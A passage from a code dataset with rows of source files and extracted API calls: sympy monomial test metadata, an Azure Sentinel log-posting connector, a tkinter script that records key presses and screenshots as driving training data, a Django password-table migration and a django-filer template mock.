monomial_lcm, monomial_max, monomial_min, monomial_divides, Monomial, InverseOrder, ProductOrder\n'), ((2684, 2702), 'sympy.polys.monomialtools.grevlex', 'grevlex', (['(1, 2, 4)'], {}), '((1, 2, 4))\n', (2691, 2702), False, 'from sympy.polys.monomialtools import monomials, monomial_count, monomial_key, lex, grlex, grevlex, monomial_mul, monomial_div, monomial_gcd, monomial_lcm, monomial_max, monomial_min, monomial_divides, Monomial, InverseOrder, ProductOrder\n'), ((2712, 2730), 'sympy.polys.monomialtools.grevlex', 'grevlex', (['(1, 3, 3)'], {}), '((1, 3, 3))\n', (2719, 2730), False, 'from sympy.polys.monomialtools import monomials, monomial_count, monomial_key, lex, grlex, grevlex, monomial_mul, monomial_div, monomial_gcd, monomial_lcm, monomial_max, monomial_min, monomial_divides, Monomial, InverseOrder, ProductOrder\n'), ((2731, 2749), 'sympy.polys.monomialtools.grevlex', 'grevlex', (['(1, 2, 4)'], {}), '((1, 2, 4))\n', (2738, 2749), False, 'from sympy.polys.monomialtools import monomials, monomial_count, monomial_key, lex, grlex, grevlex, monomial_mul, monomial_div, monomial_gcd, monomial_lcm, monomial_max, monomial_min, monomial_divides, Monomial, InverseOrder, ProductOrder\n'), ((2760, 2778), 'sympy.polys.monomialtools.grevlex', 'grevlex', (['(0, 2, 3)'], {}), '((0, 2, 3))\n', (2767, 2778), False, 'from sympy.polys.monomialtools import monomials, monomial_count, monomial_key, lex, grlex, grevlex, monomial_mul, monomial_div, monomial_gcd, monomial_lcm, monomial_max, monomial_min, monomial_divides, Monomial, InverseOrder, ProductOrder\n'), ((2779, 2797), 'sympy.polys.monomialtools.grevlex', 'grevlex', (['(1, 2, 2)'], {}), '((1, 2, 2))\n', (2786, 2797), False, 'from sympy.polys.monomialtools import monomials, monomial_count, monomial_key, lex, grlex, grevlex, monomial_mul, monomial_div, monomial_gcd, monomial_lcm, monomial_max, monomial_min, monomial_divides, Monomial, InverseOrder, ProductOrder\n'), ((2807, 2825), 'sympy.polys.monomialtools.grevlex', 'grevlex', (['(1, 1, 3)'], {}), '((1, 1, 3))\n', (2814, 2825), False, 'from sympy.polys.monomialtools import monomials, monomial_count, monomial_key, lex, grlex, grevlex, monomial_mul, monomial_div, monomial_gcd, monomial_lcm, monomial_max, monomial_min, monomial_divides, Monomial, InverseOrder, ProductOrder\n'), ((2826, 2844), 'sympy.polys.monomialtools.grevlex', 'grevlex', (['(1, 2, 2)'], {}), '((1, 2, 2))\n', (2833, 2844), False, 'from sympy.polys.monomialtools import monomials, monomial_count, monomial_key, lex, grlex, grevlex, monomial_mul, monomial_div, monomial_gcd, monomial_lcm, monomial_max, monomial_min, monomial_divides, Monomial, InverseOrder, ProductOrder\n'), ((2855, 2873), 'sympy.polys.monomialtools.grevlex', 'grevlex', (['(0, 1, 1)'], {}), '((0, 1, 1))\n', (2862, 2873), False, 'from sympy.polys.monomialtools import monomials, monomial_count, monomial_key, lex, grlex, grevlex, monomial_mul, monomial_div, monomial_gcd, monomial_lcm, monomial_max, monomial_min, monomial_divides, Monomial, InverseOrder, ProductOrder\n'), ((2874, 2892), 'sympy.polys.monomialtools.grevlex', 'grevlex', (['(0, 0, 2)'], {}), '((0, 0, 2))\n', (2881, 2892), False, 'from sympy.polys.monomialtools import monomials, monomial_count, monomial_key, lex, grlex, grevlex, monomial_mul, monomial_div, monomial_gcd, monomial_lcm, monomial_max, monomial_min, monomial_divides, Monomial, InverseOrder, ProductOrder\n'), ((2902, 2920), 'sympy.polys.monomialtools.grevlex', 'grevlex', (['(0, 3, 1)'], {}), '((0, 3, 1))\n', (2909, 2920), False, 'from sympy.polys.monomialtools import monomials, monomial_count, monomial_key, lex, grlex, grevlex, monomial_mul, monomial_div, monomial_gcd, monomial_lcm, monomial_max, monomial_min, monomial_divides, Monomial, InverseOrder, ProductOrder\n'), ((2921, 2939), 'sympy.polys.monomialtools.grevlex', 'grevlex', (['(2, 2, 1)'], {}), '((2, 2, 1))\n', (2928, 2939), False, 'from sympy.polys.monomialtools import monomials, monomial_count, monomial_key, lex, grlex, grevlex, monomial_mul, monomial_div, monomial_gcd, monomial_lcm, monomial_max, monomial_min, monomial_divides, Monomial, InverseOrder, ProductOrder\n'), ((3422, 3436), 'sympy.polys.monomialtools.monomial_key', 'monomial_key', ([], {}), '()\n', (3434, 3436), False, 'from sympy.polys.monomialtools import monomials, monomial_count, monomial_key, lex, grlex, grevlex, monomial_mul, monomial_div, monomial_gcd, monomial_lcm, monomial_max, monomial_min, monomial_divides, Monomial, InverseOrder, ProductOrder\n'), ((3456, 3475), 'sympy.polys.monomialtools.monomial_key', 'monomial_key', (['"""lex"""'], {}), "('lex')\n", (3468, 3475), False, 'from sympy.polys.monomialtools import monomials, monomial_count, monomial_key, lex, grlex, grevlex, monomial_mul, monomial_div, monomial_gcd, monomial_lcm, monomial_max, monomial_min, monomial_divides, Monomial, InverseOrder, ProductOrder\n'), ((3494, 3515), 'sympy.polys.monomialtools.monomial_key', 'monomial_key', (['"""grlex"""'], {}), "('grlex')\n", (3506, 3515), False, 'from sympy.polys.monomialtools import monomials, monomial_count, monomial_key, lex, grlex, grevlex, monomial_mul, monomial_div, monomial_gcd, monomial_lcm, monomial_max, monomial_min, monomial_divides, Monomial, InverseOrder, ProductOrder\n'), ((3536, 3559), 'sympy.polys.monomialtools.monomial_key', 'monomial_key', (['"""grevlex"""'], {}), "('grevlex')\n", (3548, 3559), False, 'from sympy.polys.monomialtools import monomials, monomial_count, monomial_key, lex, grlex, grevlex, monomial_mul, monomial_div, monomial_gcd, monomial_lcm, monomial_max, monomial_min, monomial_divides, Monomial, InverseOrder, ProductOrder\n'), ((3697, 3731), 'sympy.polys.monomialtools.monomial_mul', 'monomial_mul', (['(3, 4, 1)', '(1, 2, 0)'], {}), '((3, 4, 1), (1, 2, 0))\n', (3709, 3731), False, 'from sympy.polys.monomialtools import monomials, monomial_count, monomial_key, lex, grlex, grevlex, monomial_mul, monomial_div, monomial_gcd, monomial_lcm, monomial_max, monomial_min, monomial_divides, Monomial, InverseOrder, ProductOrder\n'), ((3776, 3810), 'sympy.polys.monomialtools.monomial_div', 'monomial_div', (['(3, 4, 1)', '(1, 2, 0)'], {}), '((3, 4, 1), (1, 2, 0))\n', (3788, 3810), False, 'from sympy.polys.monomialtools import monomials, monomial_count, monomial_key, lex, grlex, grevlex, monomial_mul, monomial_div, monomial_gcd, monomial_lcm, monomial_max, monomial_min, monomial_divides, Monomial, InverseOrder, ProductOrder\n'), ((3855, 3889), 'sympy.polys.monomialtools.monomial_gcd', 'monomial_gcd', (['(3, 4, 1)', '(1, 2, 0)'], {}), '((3, 4, 1), (1, 2, 0))\n', (3867, 3889), False, 'from sympy.polys.monomialtools import monomials, monomial_count, monomial_key, lex, grlex, grevlex, monomial_mul, monomial_div, monomial_gcd, monomial_lcm, monomial_max, monomial_min, monomial_divides, Monomial, InverseOrder, ProductOrder\n'), ((3934, 3968), 'sympy.polys.monomialtools.monomial_lcm', 'monomial_lcm', (['(3, 4, 1)', '(1, 2, 0)'], {}), '((3, 4, 1), (1, 2, 0))\n', (3946, 3968), False, 'from sympy.polys.monomialtools import monomials, monomial_count, monomial_key, lex, grlex, grevlex, monomial_mul, monomial_div, monomial_gcd, monomial_lcm, monomial_max, monomial_min, monomial_divides, Monomial, InverseOrder, ProductOrder\n'), ((4013, 4058), 'sympy.polys.monomialtools.monomial_max', 'monomial_max', (['(3, 4, 5)', '(0, 5, 1)', '(6, 3, 9)'], {}), '((3, 4, 5), (0, 5, 1), (6, 3, 9))\n', (4025, 4058), False, 'from sympy.polys.monomialtools import monomials, monomial_count, monomial_key, lex, grlex, grevlex, monomial_mul, monomial_div, monomial_gcd, monomial_lcm, monomial_max, monomial_min, monomial_divides, Monomial, InverseOrder, ProductOrder\n'), ((4101, 4146), 'sympy.polys.monomialtools.monomial_min', 'monomial_min', (['(3, 4, 5)', '(0, 5, 1)', '(6, 3, 9)'], {}), '((3, 4, 5), (0, 5, 1), (6, 3, 9))\n', (4113, 4146), False, 'from sympy.polys.monomialtools import monomials, monomial_count, monomial_key, lex, grlex, grevlex, monomial_mul, monomial_div, monomial_gcd, monomial_lcm, monomial_max, monomial_min, monomial_divides, Monomial, InverseOrder, ProductOrder\n'), ((4193, 4231), 'sympy.polys.monomialtools.monomial_divides', 'monomial_divides', (['(1, 2, 3)', '(4, 5, 6)'], {}), '((1, 2, 3), (4, 5, 6))\n', (4209, 4231), False, 'from sympy.polys.monomialtools import monomials, monomial_count, monomial_key, lex, grlex, grevlex, monomial_mul, monomial_div, monomial_gcd, monomial_lcm, monomial_max, monomial_min, monomial_divides, Monomial, InverseOrder, ProductOrder\n'), ((4247, 4285), 'sympy.polys.monomialtools.monomial_divides', 'monomial_divides', (['(1, 2, 3)', '(0, 5, 6)'], {}), '((1, 2, 3), (0, 5, 6))\n', (4263, 4285), False, 'from sympy.polys.monomialtools import monomials, monomial_count, monomial_key, lex, grlex, grevlex, monomial_mul, monomial_div, monomial_gcd, monomial_lcm, monomial_max, monomial_min, monomial_divides, Monomial, InverseOrder, ProductOrder\n'), ((5052, 5071), 'sympy.polys.monomialtools.Monomial', 'Monomial', (['(4, 6, 1)'], {}), '((4, 6, 1))\n', (5060, 5071), False, 'from sympy.polys.monomialtools import monomials, monomial_count, monomial_key, lex, grlex, grevlex, monomial_mul, monomial_div, monomial_gcd, monomial_lcm, monomial_max, monomial_min, monomial_divides, Monomial, InverseOrder, ProductOrder\n'), ((5090, 5109), 'sympy.polys.monomialtools.Monomial', 'Monomial', (['(2, 2, 1)'], {}), '((2, 2, 1))\n', (5098, 5109), False, 'from sympy.polys.monomialtools import monomials, monomial_count, monomial_key, lex, grlex, grevlex, monomial_mul, monomial_div, monomial_gcd, monomial_lcm, monomial_max, monomial_min, monomial_divides, Monomial, InverseOrder, ProductOrder\n'), ((5137, 5156), 'sympy.polys.monomialtools.Monomial', 'Monomial', (['(4, 6, 1)'], {}), '((4, 6, 1))\n', (5145, 5156), False, 'from sympy.polys.monomialtools import monomials, monomial_count, monomial_key, lex, grlex, grevlex, monomial_mul, monomial_div, monomial_gcd, monomial_lcm, monomial_max, monomial_min, monomial_divides, Monomial, InverseOrder, ProductOrder\n'), ((5183, 5202), 'sympy.polys.monomialtools.Monomial', 'Monomial', (['(2, 2, 1)'], {}), '((2, 2, 1))\n', (5191, 5202), False, 'from sympy.polys.monomialtools import monomials, monomial_count, monomial_key, lex, grlex, grevlex, monomial_mul, monomial_div, monomial_gcd, monomial_lcm, monomial_max, monomial_min, monomial_divides, Monomial, InverseOrder, ProductOrder\n'), ((5227, 5246), 'sympy.polys.monomialtools.Monomial', 'Monomial', (['(1, 2, 0)'], {}), '((1, 2, 0))\n', (5235, 5246), False, 'from sympy.polys.monomialtools import monomials, monomial_count, monomial_key, lex, grlex, grevlex, monomial_mul, monomial_div, monomial_gcd, monomial_lcm, monomial_max, monomial_min, monomial_divides, Monomial, InverseOrder, ProductOrder\n'), ((5270, 5289), 'sympy.polys.monomialtools.Monomial', 'Monomial', (['(3, 4, 1)'], {}), '((3, 4, 1))\n', (5278, 5289), False, 'from sympy.polys.monomialtools import monomials, monomial_count, monomial_key, lex, grlex, grevlex, monomial_mul, monomial_div, monomial_gcd, monomial_lcm, monomial_max, monomial_min, monomial_divides, Monomial, InverseOrder, ProductOrder\n'), ((5322, 5341), 'sympy.polys.monomialtools.Monomial', 'Monomial', (['(1, 2, 0)'], {}), '((1, 2, 0))\n', (5330, 5341), False, 'from sympy.polys.monomialtools import monomials, monomial_count, monomial_key, lex, grlex, grevlex, monomial_mul, monomial_div, monomial_gcd, monomial_lcm, monomial_max, monomial_min, monomial_divides, Monomial, InverseOrder, ProductOrder\n'), ((5373, 5392), 'sympy.polys.monomialtools.Monomial', 'Monomial', (['(3, 4, 1)'], {}), '((3, 4, 1))\n', (5381, 5392), False, 'from sympy.polys.monomialtools import monomials, monomial_count, monomial_key, lex, grlex, grevlex, monomial_mul, monomial_div, monomial_gcd, monomial_lcm, monomial_max, monomial_min, monomial_divides, Monomial, InverseOrder, ProductOrder\n'), ((5413, 5432), 'sympy.polys.monomialtools.Monomial', 'Monomial', (['(0, 0, 0)'], {}), '((0, 0, 0))\n', (5421, 5432), False, 'from sympy.polys.monomialtools import monomials, monomial_count, monomial_key, lex, grlex, grevlex, monomial_mul, monomial_div, monomial_gcd, monomial_lcm, monomial_max, monomial_min, monomial_divides, Monomial, InverseOrder, ProductOrder\n'), ((5473, 5492), 'sympy.polys.monomialtools.Monomial', 'Monomial', (['(6, 8, 2)'], {}), '((6, 8, 2))\n', (5481, 5492), False, 'from sympy.polys.monomialtools import monomials, monomial_count, monomial_key, lex, grlex, grevlex, monomial_mul, monomial_div, monomial_gcd, monomial_lcm, monomial_max, monomial_min, monomial_divides, Monomial, InverseOrder, ProductOrder\n'), ((5512, 5532), 'sympy.polys.monomialtools.Monomial', 'Monomial', (['(9, 12, 3)'], {}), '((9, 12, 3))\n', (5520, 5532), False, 'from sympy.polys.monomialtools import monomials, monomial_count, monomial_key, lex, grlex, grevlex, monomial_mul, monomial_div, monomial_gcd, monomial_lcm, monomial_max, monomial_min, monomial_divides, Monomial, InverseOrder, ProductOrder\n'), ((536, 552), 'sympy.polys.monomialtools.monomials', 'monomials', (['[]', '(0)'], {}), '([], 0)\n', (545, 552), False, 'from sympy.polys.monomialtools import monomials, monomial_count, monomial_key, lex, grlex, grevlex, monomial_mul, monomial_div, monomial_gcd, monomial_lcm, monomial_max, monomial_min, monomial_divides, Monomial, InverseOrder, ProductOrder\n'), ((579, 595), 'sympy.polys.monomialtools.monomials', 'monomials', (['[]', '(1)'], {}), '([], 1)\n', (588, 595), False, 'from sympy.polys.monomialtools import monomials, monomial_count, monomial_key, lex, grlex, grevlex, monomial_mul, monomial_div, monomial_gcd, monomial_lcm, monomial_max, monomial_min, monomial_divides, Monomial, InverseOrder, ProductOrder\n'), ((622, 638), 'sympy.polys.monomialtools.monomials', 'monomials', (['[]', '(2)'], {}), '([], 2)\n', (631, 638), False, 'from sympy.polys.monomialtools import monomials, monomial_count, monomial_key, lex, grlex, grevlex, monomial_mul, monomial_div, monomial_gcd, monomial_lcm, monomial_max, monomial_min, monomial_divides, Monomial, InverseOrder, ProductOrder\n'), ((665, 681), 'sympy.polys.monomialtools.monomials', 'monomials', (['[]', '(3)'], {}), '([], 3)\n', (674, 681), False, 'from sympy.polys.monomialtools import monomials, monomial_count, monomial_key, lex, grlex, grevlex, monomial_mul, monomial_div, monomial_gcd, monomial_lcm, monomial_max, monomial_min, monomial_divides, Monomial, InverseOrder, ProductOrder\n'), ((709, 726), 'sympy.polys.monomialtools.monomials', 'monomials', (['[x]', '(0)'], {}), '([x], 0)\n', (718, 726), False, 'from sympy.polys.monomialtools import monomials, monomial_count, monomial_key, lex, grlex, grevlex, monomial_mul, monomial_div, monomial_gcd, monomial_lcm, monomial_max, monomial_min, monomial_divides, Monomial, InverseOrder, ProductOrder\n'), ((753, 770), 'sympy.polys.monomialtools.monomials', 'monomials', (['[x]', '(1)'], {}), '([x], 1)\n', (762, 770), False, 'from sympy.polys.monomialtools import monomials, monomial_count, monomial_key, lex, grlex, grevlex, monomial_mul, monomial_div, monomial_gcd, monomial_lcm, monomial_max, monomial_min, monomial_divides, Monomial, InverseOrder, ProductOrder\n'), ((800, 817), 'sympy.polys.monomialtools.monomials', 'monomials', (['[x]', '(2)'], {}), '([x], 2)\n', (809, 817), False, 'from sympy.polys.monomialtools import monomials, monomial_count, monomial_key, lex, grlex, grevlex, monomial_mul, monomial_div, monomial_gcd, monomial_lcm, monomial_max, monomial_min, monomial_divides, Monomial, InverseOrder, ProductOrder\n'), ((853, 870), 'sympy.polys.monomialtools.monomials', 'monomials', (['[x]', '(3)'], {}), '([x], 3)\n', (862, 870), False, 'from sympy.polys.monomialtools import monomials, monomial_count, monomial_key, lex, grlex, grevlex, monomial_mul, monomial_div, monomial_gcd, monomial_lcm, monomial_max, monomial_min, monomial_divides, Monomial, InverseOrder, ProductOrder\n'), ((913, 933), 'sympy.polys.monomialtools.monomials', 'monomials', (['[x, y]', '(0)'], {}), '([x, y], 0)\n', (922, 933), False, 'from sympy.polys.monomialtools import monomials, monomial_count, monomial_key, lex, grlex, grevlex, monomial_mul, monomial_div, monomial_gcd, monomial_lcm, monomial_max, monomial_min, monomial_divides, Monomial, InverseOrder, ProductOrder\n'), ((960, 980), 'sympy.polys.monomialtools.monomials', 'monomials', (['[x, y]', '(1)'], {}), '([x, y], 1)\n', (969, 980), False, 'from sympy.polys.monomialtools import monomials, monomial_count, monomial_key, lex, grlex, grevlex, monomial_mul, monomial_div, monomial_gcd, monomial_lcm, monomial_max, monomial_min, monomial_divides, Monomial, InverseOrder, ProductOrder\n'), ((1013, 1033), 'sympy.polys.monomialtools.monomials', 'monomials', (['[x, y]', '(2)'], {}), '([x, y], 2)\n', (1022, 1033), False, 'from sympy.polys.monomialtools import monomials, monomial_count, monomial_key, lex, grlex, grevlex, monomial_mul, monomial_div, monomial_gcd, monomial_lcm, monomial_max, monomial_min, monomial_divides, Monomial, InverseOrder, ProductOrder\n'), ((1083, 1103), 'sympy.polys.monomialtools.monomials', 'monomials', (['[x, y]', '(3)'], {}), '([x, y], 3)\n', (1092, 1103), False, 'from sympy.polys.monomialtools import monomials, monomial_count, monomial_key, lex, grlex, grevlex, monomial_mul, monomial_div, monomial_gcd, monomial_lcm, monomial_max, monomial_min, monomial_divides, Monomial, InverseOrder, ProductOrder\n')] |
johnbilliris/Azure-Sentinel | Solutions/TenableIO/Data Connectors/azure_sentinel.py | ef3c2e3919023e80e15a94544e06e37623e7c1d3 | import re
import base64
import hmac
import hashlib
import logging
import requests
from datetime import datetime
class AzureSentinel:
def __init__(self, workspace_id, workspace_key, log_type, log_analytics_url=''):
self._workspace_id = workspace_id
self._workspace_key = workspace_key
self._log_type = log_type
if ((log_analytics_url in (None, '') or str(log_analytics_url).isspace())):
log_analytics_url = 'https://' + self._workspace_id + '.ods.opinsights.azure.com'
pattern = r"https:\/\/([\w\-]+)\.ods\.opinsights\.azure.([a-zA-Z\.]+)$"
if not re.match(pattern, str(log_analytics_url)):
raise Exception("Invalid Log Analytics Uri.")
self._log_analytics_url = log_analytics_url
def build_signature(self, date, content_length, method, content_type, resource):
x_headers = 'x-ms-date:' + date
string_to_hash = method + "\n" + \
str(content_length) + "\n" + content_type + \
"\n" + x_headers + "\n" + resource
bytes_to_hash = bytes(string_to_hash, encoding="utf-8")
decoded_key = base64.b64decode(self._workspace_key)
encoded_hash = base64.b64encode(hmac.new(
decoded_key, bytes_to_hash, digestmod=hashlib.sha256).digest()).decode()
authorization = "SharedKey {}:{}".format(
self._workspace_id, encoded_hash)
return authorization
def post_data(self, body):
logging.info('constructing post to send to Azure Sentinel.')
method = 'POST'
content_type = 'application/json'
resource = '/api/logs'
rfc1123date = datetime.utcnow().strftime('%a, %d %b %Y %H:%M:%S GMT')
content_length = len(body)
logging.info('build signature.')
signature = self.build_signature(
rfc1123date, content_length, method, content_type, resource)
logging.info('signature built.')
uri = self._log_analytics_url + resource + '?api-version=2016-04-01'
headers = {
'content-type': content_type,
'Authorization': signature,
'Log-Type': self._log_type,
'x-ms-date': rfc1123date
}
logging.info('sending post to Azure Sentinel.')
response = requests.post(uri, data=body, headers=headers)
logging.info(response.status_code)
if (response.status_code >= 200 and response.status_code <= 299):
return response.status_code
else:
logging.warn("Events are not processed into Azure. Response code: {}".format(
response.status_code))
raise Exception(
f'Sending to Azure Sentinel failed with status code {response.status_code}')
| [((1128, 1165), 'base64.b64decode', 'base64.b64decode', (['self._workspace_key'], {}), '(self._workspace_key)\n', (1144, 1165), False, 'import base64\n'), ((1466, 1526), 'logging.info', 'logging.info', (['"""constructing post to send to Azure Sentinel."""'], {}), "('constructing post to send to Azure Sentinel.')\n", (1478, 1526), False, 'import logging\n'), ((1745, 1777), 'logging.info', 'logging.info', (['"""build signature."""'], {}), "('build signature.')\n", (1757, 1777), False, 'import logging\n'), ((1901, 1933), 'logging.info', 'logging.info', (['"""signature built."""'], {}), "('signature built.')\n", (1913, 1933), False, 'import logging\n'), ((2208, 2255), 'logging.info', 'logging.info', (['"""sending post to Azure Sentinel."""'], {}), "('sending post to Azure Sentinel.')\n", (2220, 2255), False, 'import logging\n'), ((2275, 2321), 'requests.post', 'requests.post', (['uri'], {'data': 'body', 'headers': 'headers'}), '(uri, data=body, headers=headers)\n', (2288, 2321), False, 'import requests\n'), ((2330, 2364), 'logging.info', 'logging.info', (['response.status_code'], {}), '(response.status_code)\n', (2342, 2364), False, 'import logging\n'), ((1646, 1663), 'datetime.datetime.utcnow', 'datetime.utcnow', ([], {}), '()\n', (1661, 1663), False, 'from datetime import datetime\n'), ((1206, 1268), 'hmac.new', 'hmac.new', (['decoded_key', 'bytes_to_hash'], {'digestmod': 'hashlib.sha256'}), '(decoded_key, bytes_to_hash, digestmod=hashlib.sha256)\n', (1214, 1268), False, 'import hmac\n')] |
siddharths067/CNN-Based-Agent-Modelling-for-Humanlike-Driving-Simulaion | MiniProject.py | 42d79fc262d60ecc9eebbe0e77a1576a04979501 | from tkinter import *
from PIL import ImageGrab
import numpy as np
import cv2
import time
import pyautogui as pg
import DirectInputRoutines as DIR
from LogKey import key_check
last_time = time.time()
one_hot = [0, 0, 0, 0, 0, 0]
hash_dict = {'w':0, 's':1, 'a':2, 'd':3, 'c':4, 'v':5}
X = []
y = []
def auto_canny(image, sigma=0.33):
# compute the median of the single channel pixel intensities
v = np.median(image)
# apply automatic Canny edge detection using the computed median
lower = int(max(0, (1.0 - sigma) * v))
upper = int(min(255, (1.0 + sigma) * v))
edged = cv2.Canny(image, lower, upper)
# return the edged image
return edged
def process_img(original_image):
processed_img = cv2.cvtColor(original_image, cv2.COLOR_BGR2GRAY)
processed_img = cv2.Canny(processed_img, threshold1=200, threshold2=300)
processed_img = cv2.Canny(processed_img, threshold1=200, threshold2=300)
#processed_img = cv2.Canny(processed_img, threshold1=200, threshold2=300)
vertices = np.array([[10,500],[10,300],[300,200],[500,200],[800,300],[800,500],
], np.int32)
processed_img = cv2.GaussianBlur(processed_img,(5,5),0)
processed_img = roi(processed_img, [vertices])
# more info: http://docs.opencv.org/3.0-beta/doc/py_tutorials/py_imgproc/py_houghlines/py_houghlines.html
# edges rho theta thresh # min length, max gap:
#lines = cv2.HoughLinesP(processed_img, 1, np.pi/180, 180, 20, 15)
#draw_lines(processed_img,lines)
return processed_img
def roi(img, vertices):
#blank mask:
mask = np.zeros_like(img)
# fill the mask
cv2.fillPoly(mask, vertices, 255)
# now only show the area that is the mask
masked = cv2.bitwise_and(img, mask)
return masked
def draw_lines(img,lines):
for line in lines:
coords = line[0]
cv2.line(img, (coords[0], coords[1]), (coords[2], coords[3]), [255,255,255], 3)
def change_tab():
pg.hotkey("alt","tab")
def send_key(e):
hash = {"w":DIR.W, "a":DIR.A, "s":DIR.S, "d":DIR.D}
return hash[e.keysym]
def keyup(e):
if(e.keysym == "Alt_L" or e.keysym == "Tab"):
return
#print('down', e.keysym)
change_tab()
DIR.ReleaseKey(send_key(e))
change_tab()
global last_time
one_hot[hash_dict[e.keysym]] = 0
temp = list(one_hot)
printscreen = np.array(ImageGrab.grab(bbox=(0,40,800,640)))
printscreen = process_img(printscreen)
print('loop took {} seconds'.format(time.time()-last_time))
print([printscreen, temp])
last_time = time.time()
X.append(printscreen)
y.append(temp)
#cv2.imshow("image", printscreen)
def keydown(e):
#print('up', e.keysym)
if(e.keysym == "Alt_L" or e.keysym == "Tab"):
return
change_tab()
DIR.ReleaseKey(send_key(e))
change_tab()
global last_time
one_hot[hash_dict[e.keysym]] = 1
temp = list(one_hot)
printscreen = np.array(ImageGrab.grab(bbox=(0,40,800,680)))
printscreen = process_img(printscreen)
print('loop took {} seconds'.format(time.time()-last_time))
print([printscreen,temp])
last_time = time.time()
X.append(printscreen)
y.append(temp)
root = Tk()
frame = Frame(root, width=100, height=100)
frame.bind("<KeyPress>", keydown)
frame.bind("<KeyRelease>", keyup)
frame.pack()
frame.focus_set()
root.mainloop()
np.save("X.npy", X)
np.save("y.npy", y) | [((196, 207), 'time.time', 'time.time', ([], {}), '()\n', (205, 207), False, 'import time\n'), ((3513, 3532), 'numpy.save', 'np.save', (['"""X.npy"""', 'X'], {}), "('X.npy', X)\n", (3520, 3532), True, 'import numpy as np\n'), ((3534, 3553), 'numpy.save', 'np.save', (['"""y.npy"""', 'y'], {}), "('y.npy', y)\n", (3541, 3553), True, 'import numpy as np\n'), ((419, 435), 'numpy.median', 'np.median', (['image'], {}), '(image)\n', (428, 435), True, 'import numpy as np\n'), ((597, 627), 'cv2.Canny', 'cv2.Canny', (['image', 'lower', 'upper'], {}), '(image, lower, upper)\n', (606, 627), False, 'import cv2\n'), ((725, 773), 'cv2.cvtColor', 'cv2.cvtColor', (['original_image', 'cv2.COLOR_BGR2GRAY'], {}), '(original_image, cv2.COLOR_BGR2GRAY)\n', (737, 773), False, 'import cv2\n'), ((795, 851), 'cv2.Canny', 'cv2.Canny', (['processed_img'], {'threshold1': '(200)', 'threshold2': '(300)'}), '(processed_img, threshold1=200, threshold2=300)\n', (804, 851), False, 'import cv2\n'), ((873, 929), 'cv2.Canny', 'cv2.Canny', (['processed_img'], {'threshold1': '(200)', 'threshold2': '(300)'}), '(processed_img, threshold1=200, threshold2=300)\n', (882, 929), False, 'import cv2\n'), ((1031, 1126), 'numpy.array', 'np.array', (['[[10, 500], [10, 300], [300, 200], [500, 200], [800, 300], [800, 500]]', 'np.int32'], {}), '([[10, 500], [10, 300], [300, 200], [500, 200], [800, 300], [800, \n 500]], np.int32)\n', (1039, 1126), True, 'import numpy as np\n'), ((1162, 1204), 'cv2.GaussianBlur', 'cv2.GaussianBlur', (['processed_img', '(5, 5)', '(0)'], {}), '(processed_img, (5, 5), 0)\n', (1178, 1204), False, 'import cv2\n'), ((1679, 1697), 'numpy.zeros_like', 'np.zeros_like', (['img'], {}), '(img)\n', (1692, 1697), True, 'import numpy as np\n'), ((1724, 1757), 'cv2.fillPoly', 'cv2.fillPoly', (['mask', 'vertices', '(255)'], {}), '(mask, vertices, 255)\n', (1736, 1757), False, 'import cv2\n'), ((1819, 1845), 'cv2.bitwise_and', 'cv2.bitwise_and', (['img', 'mask'], {}), '(img, mask)\n', (1834, 1845), False, 'import cv2\n'), ((2062, 2085), 'pyautogui.hotkey', 'pg.hotkey', (['"""alt"""', '"""tab"""'], {}), "('alt', 'tab')\n", (2071, 2085), True, 'import pyautogui as pg\n'), ((2684, 2695), 'time.time', 'time.time', ([], {}), '()\n', (2693, 2695), False, 'import time\n'), ((3274, 3285), 'time.time', 'time.time', ([], {}), '()\n', (3283, 3285), False, 'import time\n'), ((1956, 2042), 'cv2.line', 'cv2.line', (['img', '(coords[0], coords[1])', '(coords[2], coords[3])', '[255, 255, 255]', '(3)'], {}), '(img, (coords[0], coords[1]), (coords[2], coords[3]), [255, 255, \n 255], 3)\n', (1964, 2042), False, 'import cv2\n'), ((2489, 2527), 'PIL.ImageGrab.grab', 'ImageGrab.grab', ([], {'bbox': '(0, 40, 800, 640)'}), '(bbox=(0, 40, 800, 640))\n', (2503, 2527), False, 'from PIL import ImageGrab\n'), ((3080, 3118), 'PIL.ImageGrab.grab', 'ImageGrab.grab', ([], {'bbox': '(0, 40, 800, 680)'}), '(bbox=(0, 40, 800, 680))\n', (3094, 3118), False, 'from PIL import ImageGrab\n'), ((2611, 2622), 'time.time', 'time.time', ([], {}), '()\n', (2620, 2622), False, 'import time\n'), ((3202, 3213), 'time.time', 'time.time', ([], {}), '()\n', (3211, 3213), False, 'import time\n')] |
jielyu/notebook | src/code/djangotest/migrations/0001_initial.py | d0c0d0306fdb2746195c9d7851af25d0393a311d | # Generated by Django 2.2.5 on 2019-10-05 23:22
from django.db import migrations, models
class Migration(migrations.Migration):
initial = True
dependencies = [
]
operations = [
migrations.CreateModel(
name='Password',
fields=[
('id', models.IntegerField(primary_key=True, serialize=False, unique=True)),
('website', models.CharField(max_length=128)),
('username', models.CharField(max_length=128)),
('pwd', models.CharField(max_length=128)),
('time_add', models.DateTimeField(auto_now_add=True, null=True)),
('time_modify', models.DateTimeField(auto_now=True)),
],
options={
'db_table': 'password_tab',
},
),
]
| [((304, 371), 'django.db.models.IntegerField', 'models.IntegerField', ([], {'primary_key': '(True)', 'serialize': '(False)', 'unique': '(True)'}), '(primary_key=True, serialize=False, unique=True)\n', (323, 371), False, 'from django.db import migrations, models\n'), ((402, 434), 'django.db.models.CharField', 'models.CharField', ([], {'max_length': '(128)'}), '(max_length=128)\n', (418, 434), False, 'from django.db import migrations, models\n'), ((466, 498), 'django.db.models.CharField', 'models.CharField', ([], {'max_length': '(128)'}), '(max_length=128)\n', (482, 498), False, 'from django.db import migrations, models\n'), ((525, 557), 'django.db.models.CharField', 'models.CharField', ([], {'max_length': '(128)'}), '(max_length=128)\n', (541, 557), False, 'from django.db import migrations, models\n'), ((589, 639), 'django.db.models.DateTimeField', 'models.DateTimeField', ([], {'auto_now_add': '(True)', 'null': '(True)'}), '(auto_now_add=True, null=True)\n', (609, 639), False, 'from django.db import migrations, models\n'), ((674, 709), 'django.db.models.DateTimeField', 'models.DateTimeField', ([], {'auto_now': '(True)'}), '(auto_now=True)\n', (694, 709), False, 'from django.db import migrations, models\n')] |
pbs/django-filer | filer/tests/utils/__init__.py | c862a84d4e1d86c14eeb509e341f6a7d39a421bf | from django.template.loaders.base import Loader as BaseLoader
from django.template.base import TemplateDoesNotExist
class Mock():
pass
class MockLoader(BaseLoader):
is_usable = True
def load_template_source(self, template_name, template_dirs=None):
if template_name == 'cms_mock_template.html':
return '<div></div>', 'template.html'
